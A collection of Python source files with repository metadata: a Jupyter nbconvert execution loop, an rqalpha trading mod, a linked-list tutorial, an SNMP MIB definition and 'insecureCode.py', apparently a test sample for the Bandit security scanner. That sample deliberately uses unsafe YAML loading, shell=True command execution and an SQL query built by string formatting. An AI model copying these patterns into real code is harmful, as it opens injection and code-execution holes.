self.log.debug("Executing cell:\n%s", cell.source)
# wait for finish, with timeout
while True:
try:
msg = self.kc.shell_channel.get_msg(timeout=self.timeout)
except Empty:
self.log.error("""Timeout waiting for execute reply (%is).
If your cell should take longer than this, you can increase the timeout with:
c.ExecutePreprocessor.timeout = SECONDS
in jupyter_nbconvert_config.py
""" % self.timeout)
if self.interrupt_on_timeout:
self.log.error("Interrupting kernel")
self.km.interrupt_kernel()
break
else:
try:
exception = TimeoutError
except NameError:
exception = RuntimeError
raise exception("Cell execution timed out, see log"
" for details.")
if msg['parent_header'].get('msg_id') == msg_id:
break
else:
# not our reply
continue
outs = []
while True:
try:
msg = self.kc.iopub_channel.get_msg(timeout=self.timeout)
except Empty:
self.log.warn("Timeout waiting for IOPub output")
break
if msg['parent_header'].get('msg_id') != msg_id:
# not an output from our execution
continue
msg_type = msg['msg_type']
self.log.debug("output: %s", msg_type)
content = msg['content']
# set the prompt number for the input and the output
if 'execution_count' in content:
cell['execution_count'] = content['execution_count']
if msg_type == 'status':
if content['execution_state'] == 'idle':
break
else:
continue
elif msg_type == 'execute_input':
continue
elif msg_type == 'clear_output':
outs = []
continue
elif msg_type.startswith('comm'):
continue
try:
out = output_from_msg(msg)
except ValueError:
self.log.error("unhandled iopub msg: " + msg_type)
else:
outs.append(out)
return outs
| 32.221053 | 93 | 0.542143 | [
"MIT"
] | wagnermarkd/stationary-hud | env/lib/python2.7/site-packages/nbconvert/preprocessors/execute.py | 6,122 | Python |
from rqalpha.interface import AbstractMod
from rqalpha.apis import *
from rqalpha.events import EVENT
from collections import defaultdict
import datetime
import os
class ForceClose(AbstractMod):
def __init__(self):
self._log_dir = None
self._log_file = defaultdict(lambda: None)
self._force_close_time = []
def start_up(self, env, mod_config):
for timespan in mod_config.force_close_time:
v = timespan.split('-')
assert len(v) == 2, "%s invalid" % mod_config.force_close_time
start_time_v = v[0].split(':')
end_time_v = v[1].split(':')
assert len(start_time_v) == 2, "%s invalid" % mod_config.force_close_time
assert len(end_time_v) == 2, "%s invalid" % mod_config.force_close_time
self._force_close_time.append({'start': {'hour': int(start_time_v[0]), 'minute': int(start_time_v[1])},
'end': {'hour': int(end_time_v[0]), 'minute': int(end_time_v[1])}})
if "log_dir" in mod_config.keys():
self._log_dir = mod_config.log_dir
if os.path.exists(self._log_dir) is False:
os.makedirs(self._log_dir)
# env.event_bus.add_listener(EVENT.BAR, self._check_force_close)
env.event_bus.prepend_listener(EVENT.BAR, self._check_force_close)
def tear_down(self, success, exception=None):
for f in self._log_file.values():
if f:
f.close()
def _check_force_close(self, event):
contract_list = list(event.bar_dict.keys())
for contract in contract_list:
event.bar_dict[contract].force_close = False
cur_time = event.calendar_dt
force_close = False
for ft in self._force_close_time:
start_time = cur_time.replace(hour=ft['start']['hour'], minute=ft['start']['minute'])
end_time = cur_time.replace(hour=ft['end']['hour'], minute=ft['end']['minute'])
if start_time <= cur_time <= end_time:
force_close = True
break
if force_close:
contract_list = list(event.bar_dict.keys())
for contract in contract_list:
long_positions = get_position(contract, POSITION_DIRECTION.LONG)
short_positions = get_position(contract, POSITION_DIRECTION.SHORT)
if long_positions.quantity == 0 and short_positions.quantity == 0:
continue
# order_to(contract, 0)
event.bar_dict[contract].force_close = True
if not self._log_dir:
continue
if not self._log_file[contract]:
path = os.path.join(self._log_dir, contract + '_force_close.csv')
self._log_file[contract] = open(path, 'w')
msg = "%s,%s" % (str(cur_time), "FORCE_CLOSE")
self._log_file[contract].write(msg + "\n")
# return True
return
# print("call _calc_flow")
# if event.bar_dict._frequency != "1m":
# return
# if len(self._kline_bar) < self._kline_bar_cnt:
# self._kline_bar.append(event.)
| 44.287671 | 115 | 0.588308 | [
"Apache-2.0"
] | wzf92/rqalpha | rqalpha/mod/rqalpha_mod_force_close/mod.py | 3,233 | Python |
#! /usr/bin/env python
# -*- coding: utf-8 -*-
# vim:fenc=utf-8
#
# Copyright © 2018 damian <damian@C-DZ-E5500>
#
# Distributed under terms of the MIT license.
"""
"""
import subprocess
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
import yaml
def read_file(filename):
with open(filename) as f:
data = yaml.load(f.read())
def run_command(cmd):
return subprocess.check_call(cmd, shell=True)
db = create_engine('sqlite:///somedatabase')
Session = sessionmaker(bind=db)
def get_user(uid):
session = Session()
query = "select * from user where id='%s'" % uid
return session.execute(query)
| 19.757576 | 52 | 0.691718 | [
"Apache-2.0"
] | DamZiobro/coding_playground | bandit/insecureCode.py | 653 | Python |
# Python program to reverse a linked list
# Time Complexity : O(n)
# Space Complexity : O(1)
# Node Class
class Node:
# Constructor to initialize the node object
def __init__(self, data):
self.data = data
self.next = None # In python, None == null
class LinkedList:
# Constructor to initialize the linked list
def __init__(self):
self.head = None
# Function to insert a new node at the beginning
def push(self, data):
node = Node(data) # This is how you create an object in python
node.next = self.head
self.head = node
# Function to insert a new node at the end
def append(self, data):
node = Node(data)
currentNode = self.head
while currentNode.next is not None:
currentNode = currentNode.next
currentNode.next = node
# Function to remove a node
def remove(self, data):
currentNode = self.head
if currentNode.data == data:
self.head = self.head.next
return
while currentNode.next is not None:
if currentNode.next.data == data:
currentNode.next = currentNode.next.next
return
currentNode = currentNode.next
# Function to search for a node
def search(self, data):
currentNode = self.head
if currentNode.data == data:
return currentNode
while currentNode.next is not Node:
if currentNode.next.data == data:
return currentNode.next
currentNode = currentNode.next
return None
# Function to reverse the linked list
def reverse(self):
temp = self.head # save the head to a temp linked list
self.head = None # reset to None
while temp is not None:
self.push(temp.data) # push to the head of the empty linked list
temp = temp.next
# Function to reverse the every k nodes in the linked list
def reverseWithK(self, head, k):
current = head
next = None
temp = None
count = 0
# Reverse first k nodes of the linked list
while(current is not None and count < k):
next = current.next
current.next = temp
temp = current
current = next
count += 1
# next is now a pointer to (k+1)th node
# recursively call for the list starting
# from current . And make rest of the list as
# next of first node (head)
if next is not None:
head.next = self.reverseWithK(next, k)
# temp is new head of the reversed list
return temp
# Utility function to print the linked list
def printList(self):
temp = self.head
while(temp):
print(temp.data),
temp = temp.next
linkedlist = LinkedList()
linkedlist.push('Siddhant')
linkedlist.push('Rahul')
linkedlist.push('DSA-Library')
linkedlist.append('XYZ')
linkedlist.remove('XYZ')
linkedlist.reverse()
linkedlist.printList()
# Driver program
llist = LinkedList()
llist.push(9)
llist.push(8)
llist.push(7)
llist.push(6)
llist.push(5)
llist.push(4)
llist.push(3)
llist.push(2)
llist.push(1)
print("\nGiven linked list")
llist.printList()
llist.head = llist.reverseWithK(llist.head, 3)
print("\nReversed Linked list with k node")
llist.printList()
"""
Output =>
Siddhant
Rahul
DSA-Library
Given linked list
1
2
3
4
5
6
7
8
9
Reversed Linked list with k node
3
2
1
6
5
4
9
8
7
"""
| 21.87037 | 77 | 0.609088 | [
"MIT"
] | AayushTyagi1/DSA-Library | Data_Structures/LinkedList/Reverse_List/reverse_LinkedList.py | 3,543 | Python |
#
# PySNMP MIB module SENAO-ENTERPRISE-INDOOR-AP-CB-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/SENAO-ENTERPRISE-INDOOR-AP-CB-MIB
# Produced by pysmi-0.3.4 at Mon Apr 29 20:53:40 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
Integer, OctetString, ObjectIdentifier = mibBuilder.importSymbols("ASN1", "Integer", "OctetString", "ObjectIdentifier")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ConstraintsUnion, ValueSizeConstraint, SingleValueConstraint, ConstraintsIntersection, ValueRangeConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "ConstraintsUnion", "ValueSizeConstraint", "SingleValueConstraint", "ConstraintsIntersection", "ValueRangeConstraint")
NotificationGroup, ModuleCompliance = mibBuilder.importSymbols("SNMPv2-CONF", "NotificationGroup", "ModuleCompliance")
MibIdentifier, iso, ObjectIdentity, NotificationType, MibScalar, MibTable, MibTableRow, MibTableColumn, TimeTicks, Gauge32, Unsigned32, IpAddress, Integer32, Counter64, Counter32, ModuleIdentity, Bits, enterprises = mibBuilder.importSymbols("SNMPv2-SMI", "MibIdentifier", "iso", "ObjectIdentity", "NotificationType", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "TimeTicks", "Gauge32", "Unsigned32", "IpAddress", "Integer32", "Counter64", "Counter32", "ModuleIdentity", "Bits", "enterprises")
MacAddress, DisplayString, TextualConvention, TruthValue = mibBuilder.importSymbols("SNMPv2-TC", "MacAddress", "DisplayString", "TextualConvention", "TruthValue")
senao = ModuleIdentity((1, 3, 6, 1, 4, 1, 14125))
if mibBuilder.loadTexts: senao.setLastUpdated('0511250000Z')
if mibBuilder.loadTexts: senao.setOrganization('Senao R&D Dept., S/W Division')
indoorWirelessDevice = MibIdentifier((1, 3, 6, 1, 4, 1, 14125, 100))
entSystem = MibIdentifier((1, 3, 6, 1, 4, 1, 14125, 100, 1))
entLAN = MibIdentifier((1, 3, 6, 1, 4, 1, 14125, 100, 2))
entWAN = MibIdentifier((1, 3, 6, 1, 4, 1, 14125, 100, 3))
entMacFilter = MibIdentifier((1, 3, 6, 1, 4, 1, 14125, 100, 4))
entWlan = MibIdentifier((1, 3, 6, 1, 4, 1, 14125, 100, 5))
entSNMP = MibIdentifier((1, 3, 6, 1, 4, 1, 14125, 100, 6))
entWlanCommonInfo = MibIdentifier((1, 3, 6, 1, 4, 1, 14125, 100, 5, 1))
entPassword = MibScalar((1, 3, 6, 1, 4, 1, 14125, 100, 1, 2), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 32))).setMaxAccess("writeonly")
if mibBuilder.loadTexts: entPassword.setStatus('mandatory')
entSysModel = MibScalar((1, 3, 6, 1, 4, 1, 14125, 100, 1, 3), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: entSysModel.setStatus('mandatory')
entSysMode = MibScalar((1, 3, 6, 1, 4, 1, 14125, 100, 1, 4), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1, 2, 3, 4, 5))).clone(namedValues=NamedValues(("ap-router", 0), ("repeater", 1), ("ap-bridge", 2), ("client-bridge", 3), ("client-router", 4), ("wds-bridge", 5)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: entSysMode.setStatus('mandatory')
entSysUpTime = MibScalar((1, 3, 6, 1, 4, 1, 14125, 100, 1, 5), TimeTicks()).setMaxAccess("readonly")
if mibBuilder.loadTexts: entSysUpTime.setStatus('mandatory')
entHwVersion = MibScalar((1, 3, 6, 1, 4, 1, 14125, 100, 1, 6), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: entHwVersion.setStatus('mandatory')
entSN = MibScalar((1, 3, 6, 1, 4, 1, 14125, 100, 1, 7), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: entSN.setStatus('mandatory')
entKenelVersion = MibScalar((1, 3, 6, 1, 4, 1, 14125, 100, 1, 8), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: entKenelVersion.setStatus('mandatory')
entAppVersion = MibScalar((1, 3, 6, 1, 4, 1, 14125, 100, 1, 9), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: entAppVersion.setStatus('mandatory')
entReset = MibScalar((1, 3, 6, 1, 4, 1, 14125, 100, 1, 10), TruthValue()).setMaxAccess("writeonly")
if mibBuilder.loadTexts: entReset.setStatus('mandatory')
entResetToDefault = MibScalar((1, 3, 6, 1, 4, 1, 14125, 100, 1, 11), TruthValue()).setMaxAccess("writeonly")
if mibBuilder.loadTexts: entResetToDefault.setStatus('mandatory')
entApplyModules = MibScalar((1, 3, 6, 1, 4, 1, 14125, 100, 1, 12), TruthValue()).setMaxAccess("writeonly")
if mibBuilder.loadTexts: entApplyModules.setStatus('mandatory')
entLANIP = MibScalar((1, 3, 6, 1, 4, 1, 14125, 100, 2, 1), IpAddress()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: entLANIP.setStatus('mandatory')
entLANSubnetMask = MibScalar((1, 3, 6, 1, 4, 1, 14125, 100, 2, 2), IpAddress()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: entLANSubnetMask.setStatus('mandatory')
entSTPEnable = MibScalar((1, 3, 6, 1, 4, 1, 14125, 100, 2, 3), TruthValue()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: entSTPEnable.setStatus('mandatory')
entDHCPEnable = MibScalar((1, 3, 6, 1, 4, 1, 14125, 100, 2, 4), TruthValue()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: entDHCPEnable.setStatus('mandatory')
entIPPoolStart = MibScalar((1, 3, 6, 1, 4, 1, 14125, 100, 2, 5), IpAddress()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: entIPPoolStart.setStatus('mandatory')
entIPPoolEnd = MibScalar((1, 3, 6, 1, 4, 1, 14125, 100, 2, 6), IpAddress()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: entIPPoolEnd.setStatus('mandatory')
entIPLeaseTime = MibScalar((1, 3, 6, 1, 4, 1, 14125, 100, 2, 7), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1, 2, 3, 4, 5, 6, 7, 8))).clone(namedValues=NamedValues(("half-hour", 0), ("one-hour", 1), ("two-hours", 2), ("half-day", 3), ("one-day", 4), ("two-days", 5), ("one-week", 6), ("two-weeks", 7), ("forever", 8)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: entIPLeaseTime.setStatus('mandatory')
entRouterEnable = MibScalar((1, 3, 6, 1, 4, 1, 14125, 100, 3, 1), TruthValue()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: entRouterEnable.setStatus('mandatory')
entLanMacFilteringEnable = MibScalar((1, 3, 6, 1, 4, 1, 14125, 100, 4, 1), TruthValue()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: entLanMacFilteringEnable.setStatus('mandatory')
entLanMacFilteringMode = MibScalar((1, 3, 6, 1, 4, 1, 14125, 100, 4, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=NamedValues(("white-list", 0), ("black-list", 1)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: entLanMacFilteringMode.setStatus('mandatory')
entLanMacFilterTable = MibTable((1, 3, 6, 1, 4, 1, 14125, 100, 4, 3), )
if mibBuilder.loadTexts: entLanMacFilterTable.setStatus('current')
entLanMacFilterEntry = MibTableRow((1, 3, 6, 1, 4, 1, 14125, 100, 4, 3, 1), ).setIndexNames((0, "SENAO-ENTERPRISE-INDOOR-AP-CB-MIB", "entMacAddressIndex"))
if mibBuilder.loadTexts: entLanMacFilterEntry.setStatus('current')
entMacAddressIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 14125, 100, 4, 3, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: entMacAddressIndex.setStatus('current')
entMacAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 14125, 100, 4, 3, 1, 2), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: entMacAddress.setStatus('current')
entMacFilteringValid = MibTableColumn((1, 3, 6, 1, 4, 1, 14125, 100, 4, 3, 1, 3), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: entMacFilteringValid.setStatus('current')
entOpMode = MibScalar((1, 3, 6, 1, 4, 1, 14125, 100, 5, 1, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1, 2, 3))).clone(namedValues=NamedValues(("ap", 0), ("client-bridge", 1), ("wds-bridge", 2), ("repeater", 3)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: entOpMode.setStatus('mandatory')
entRadio = MibScalar((1, 3, 6, 1, 4, 1, 14125, 100, 5, 1, 2), TruthValue()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: entRadio.setStatus('mandatory')
entAPMode = MibScalar((1, 3, 6, 1, 4, 1, 14125, 100, 5, 1, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=NamedValues(("ap", 0), ("wds", 1)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: entAPMode.setStatus('mandatory')
entBand = MibScalar((1, 3, 6, 1, 4, 1, 14125, 100, 5, 1, 4), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1, 2, 4, 6, 7, 8, 9))).clone(namedValues=NamedValues(("ieee802dot11-b-g", 0), ("ieee802dot11-b", 1), ("ieee802dot11-a", 2), ("ieee802dot11-g", 4), ("ieee802dot11-n", 6), ("ieee802dot11-g-n", 7), ("ieee802dot11-a-n", 8), ("ieee802dot11-b-g-n", 9)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: entBand.setStatus('mandatory')
entESSIDNum = MibScalar((1, 3, 6, 1, 4, 1, 14125, 100, 5, 1, 5), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 4))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: entESSIDNum.setStatus('mandatory')
entChannel = MibScalar((1, 3, 6, 1, 4, 1, 14125, 100, 5, 1, 6), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 14))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: entChannel.setStatus('mandatory')
entDataRate = MibScalar((1, 3, 6, 1, 4, 1, 14125, 100, 5, 1, 7), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1, 2, 5, 11, 6, 9, 12, 18, 24, 36, 48, 54))).clone(namedValues=NamedValues(("auto", 0), ("oneMbps", 1), ("twoMbps", 2), ("fiveNhalfMbps", 5), ("elevenMbps", 11), ("sixMbps", 6), ("nineMbps", 9), ("twelveMbps", 12), ("eighteenMbps", 18), ("twentytwoMbps", 24), ("thirtysixMbps", 36), ("fortyeightMbps", 48), ("fiftyfourMbps", 54)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: entDataRate.setStatus('mandatory')
entNDataRate = MibScalar((1, 3, 6, 1, 4, 1, 14125, 100, 5, 1, 8), Integer32()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: entNDataRate.setStatus('mandatory')
entTxPower = MibScalar((1, 3, 6, 1, 4, 1, 14125, 100, 5, 1, 9), Integer32()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: entTxPower.setStatus('mandatory')
entBeaconInterval = MibScalar((1, 3, 6, 1, 4, 1, 14125, 100, 5, 1, 10), Integer32().subtype(subtypeSpec=ValueRangeConstraint(20, 1024))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: entBeaconInterval.setStatus('mandatory')
entDTIMPeriod = MibScalar((1, 3, 6, 1, 4, 1, 14125, 100, 5, 1, 11), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 255))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: entDTIMPeriod.setStatus('mandatory')
entFragmentationThreshold = MibScalar((1, 3, 6, 1, 4, 1, 14125, 100, 5, 1, 12), Integer32().subtype(subtypeSpec=ValueRangeConstraint(256, 2346))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: entFragmentationThreshold.setStatus('mandatory')
entRTSThreshold = MibScalar((1, 3, 6, 1, 4, 1, 14125, 100, 5, 1, 13), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 2347))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: entRTSThreshold.setStatus('mandatory')
entChannelBandwidth = MibScalar((1, 3, 6, 1, 4, 1, 14125, 100, 5, 1, 14), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 1))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: entChannelBandwidth.setStatus('mandatory')
entPreambleType = MibScalar((1, 3, 6, 1, 4, 1, 14125, 100, 5, 1, 15), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("short", 1), ("long", 2)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: entPreambleType.setStatus('mandatory')
entCTSProtection = MibScalar((1, 3, 6, 1, 4, 1, 14125, 100, 5, 1, 16), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1, 2))).clone(namedValues=NamedValues(("auto", 0), ("always", 1), ("none", 2)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: entCTSProtection.setStatus('mandatory')
entWlanESSIDInfoTable = MibTable((1, 3, 6, 1, 4, 1, 14125, 100, 5, 2), )
if mibBuilder.loadTexts: entWlanESSIDInfoTable.setStatus('current')
entWlanESSIDInfoEntry = MibTableRow((1, 3, 6, 1, 4, 1, 14125, 100, 5, 2, 1), ).setIndexNames((0, "SENAO-ENTERPRISE-INDOOR-AP-CB-MIB", "entWlanESSIDInfoIndex"))
if mibBuilder.loadTexts: entWlanESSIDInfoEntry.setStatus('current')
entWlanESSIDInfoIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 14125, 100, 5, 2, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: entWlanESSIDInfoIndex.setStatus('current')
entESSID = MibTableColumn((1, 3, 6, 1, 4, 1, 14125, 100, 5, 2, 1, 2), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 32))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: entESSID.setStatus('current')
entBroadcastESSID = MibTableColumn((1, 3, 6, 1, 4, 1, 14125, 100, 5, 2, 1, 3), TruthValue()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: entBroadcastESSID.setStatus('mandatory')
entWMM = MibTableColumn((1, 3, 6, 1, 4, 1, 14125, 100, 5, 2, 1, 4), TruthValue()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: entWMM.setStatus('mandatory')
entEncryption = MibTableColumn((1, 3, 6, 1, 4, 1, 14125, 100, 5, 2, 1, 5), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 4))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: entEncryption.setStatus('current')
entWlanAuthenticationType = MibTableColumn((1, 3, 6, 1, 4, 1, 14125, 100, 5, 2, 1, 6), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 8))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: entWlanAuthenticationType.setStatus('current')
entWlanWepInfoTable = MibTable((1, 3, 6, 1, 4, 1, 14125, 100, 5, 3), )
if mibBuilder.loadTexts: entWlanWepInfoTable.setStatus('current')
entWlanWepInfoEntry = MibTableRow((1, 3, 6, 1, 4, 1, 14125, 100, 5, 3, 1), ).setIndexNames((0, "SENAO-ENTERPRISE-INDOOR-AP-CB-MIB", "entWlanESSIDIndex"))
if mibBuilder.loadTexts: entWlanWepInfoEntry.setStatus('current')
entWlanESSIDIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 14125, 100, 5, 3, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: entWlanESSIDIndex.setStatus('current')
entWlanWepKeyID = MibTableColumn((1, 3, 6, 1, 4, 1, 14125, 100, 5, 3, 1, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 4))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: entWlanWepKeyID.setStatus('current')
entWlanWepKey1Value = MibTableColumn((1, 3, 6, 1, 4, 1, 14125, 100, 5, 3, 1, 3), OctetString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: entWlanWepKey1Value.setStatus('current')
entWlanWepKey2Value = MibTableColumn((1, 3, 6, 1, 4, 1, 14125, 100, 5, 3, 1, 4), OctetString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: entWlanWepKey2Value.setStatus('current')
entWlanWepKey3Value = MibTableColumn((1, 3, 6, 1, 4, 1, 14125, 100, 5, 3, 1, 5), OctetString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: entWlanWepKey3Value.setStatus('current')
entWlanWepKey4Value = MibTableColumn((1, 3, 6, 1, 4, 1, 14125, 100, 5, 3, 1, 6), OctetString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: entWlanWepKey4Value.setStatus('current')
entWlanWPAInfoTable = MibTable((1, 3, 6, 1, 4, 1, 14125, 100, 5, 4), )
if mibBuilder.loadTexts: entWlanWPAInfoTable.setStatus('current')
entWlanWPAInfoEntry = MibTableRow((1, 3, 6, 1, 4, 1, 14125, 100, 5, 4, 1), ).setIndexNames((0, "SENAO-ENTERPRISE-INDOOR-AP-CB-MIB", "entWlanWPAESSIDIndex"))
if mibBuilder.loadTexts: entWlanWPAInfoEntry.setStatus('current')
entWlanWPAESSIDIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 14125, 100, 5, 4, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: entWlanWPAESSIDIndex.setStatus('current')
entPresharedKey = MibTableColumn((1, 3, 6, 1, 4, 1, 14125, 100, 5, 4, 1, 2), DisplayString()).setMaxAccess("writeonly")
if mibBuilder.loadTexts: entPresharedKey.setStatus('current')
ent802dot1xInfoTable = MibTable((1, 3, 6, 1, 4, 1, 14125, 100, 5, 5), )
if mibBuilder.loadTexts: ent802dot1xInfoTable.setStatus('current')
ent802dot1xInfoEntry = MibTableRow((1, 3, 6, 1, 4, 1, 14125, 100, 5, 5, 1), ).setIndexNames((0, "SENAO-ENTERPRISE-INDOOR-AP-CB-MIB", "entWlan802dot1xESSIDIndex"))
if mibBuilder.loadTexts: ent802dot1xInfoEntry.setStatus('current')
entWlan802dot1xESSIDIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 14125, 100, 5, 5, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: entWlan802dot1xESSIDIndex.setStatus('current')
entRADIUSServerIPAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 14125, 100, 5, 5, 1, 2), IpAddress()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: entRADIUSServerIPAddress.setStatus('current')
entRADIUSServerPort = MibTableColumn((1, 3, 6, 1, 4, 1, 14125, 100, 5, 5, 1, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 65535))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: entRADIUSServerPort.setStatus('current')
entRADIUSServerPassword = MibTableColumn((1, 3, 6, 1, 4, 1, 14125, 100, 5, 5, 1, 4), DisplayString()).setMaxAccess("writeonly")
if mibBuilder.loadTexts: entRADIUSServerPassword.setStatus('current')
entWlan802dot1xEnable = MibTableColumn((1, 3, 6, 1, 4, 1, 14125, 100, 5, 5, 1, 5), TruthValue()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: entWlan802dot1xEnable.setStatus('current')
entWlanClientListInfoTable = MibTable((1, 3, 6, 1, 4, 1, 14125, 100, 5, 6), )
if mibBuilder.loadTexts: entWlanClientListInfoTable.setStatus('current')
entWlanClientListInfoEntry = MibTableRow((1, 3, 6, 1, 4, 1, 14125, 100, 5, 6, 1), ).setIndexNames((0, "SENAO-ENTERPRISE-INDOOR-AP-CB-MIB", "entCLInfoIndex"))
if mibBuilder.loadTexts: entWlanClientListInfoEntry.setStatus('current')
entCLInfoIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 14125, 100, 5, 6, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: entCLInfoIndex.setStatus('current')
entCLInterface = MibTableColumn((1, 3, 6, 1, 4, 1, 14125, 100, 5, 6, 1, 2), OctetString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: entCLInterface.setStatus('current')
entCLMAC = MibTableColumn((1, 3, 6, 1, 4, 1, 14125, 100, 5, 6, 1, 3), OctetString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: entCLMAC.setStatus('current')
entCLRx = MibTableColumn((1, 3, 6, 1, 4, 1, 14125, 100, 5, 6, 1, 4), OctetString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: entCLRx.setStatus('current')
entCLTx = MibTableColumn((1, 3, 6, 1, 4, 1, 14125, 100, 5, 6, 1, 5), OctetString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: entCLTx.setStatus('current')
entCLSignal = MibTableColumn((1, 3, 6, 1, 4, 1, 14125, 100, 5, 6, 1, 6), Integer32()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: entCLSignal.setStatus('current')
entCLConnectedTime = MibTableColumn((1, 3, 6, 1, 4, 1, 14125, 100, 5, 6, 1, 7), OctetString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: entCLConnectedTime.setStatus('current')
entCLIdleTime = MibTableColumn((1, 3, 6, 1, 4, 1, 14125, 100, 5, 6, 1, 8), OctetString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: entCLIdleTime.setStatus('current')
entSNMPStatus = MibScalar((1, 3, 6, 1, 4, 1, 14125, 100, 6, 1), TruthValue()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: entSNMPStatus.setStatus('mandatory')
entSNMPVerType = MibScalar((1, 3, 6, 1, 4, 1, 14125, 100, 6, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1, 2, 3))).clone(namedValues=NamedValues(("all", 0), ("v1", 1), ("v2c", 2), ("v3", 3)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: entSNMPVerType.setStatus('mandatory')
entSNMPCommunityTable = MibTable((1, 3, 6, 1, 4, 1, 14125, 100, 6, 3), )
if mibBuilder.loadTexts: entSNMPCommunityTable.setStatus('current')
entSNMPCommunityEntry = MibTableRow((1, 3, 6, 1, 4, 1, 14125, 100, 6, 3, 1), ).setIndexNames((0, "SENAO-ENTERPRISE-INDOOR-AP-CB-MIB", "entSNMPCommunityIndex"))
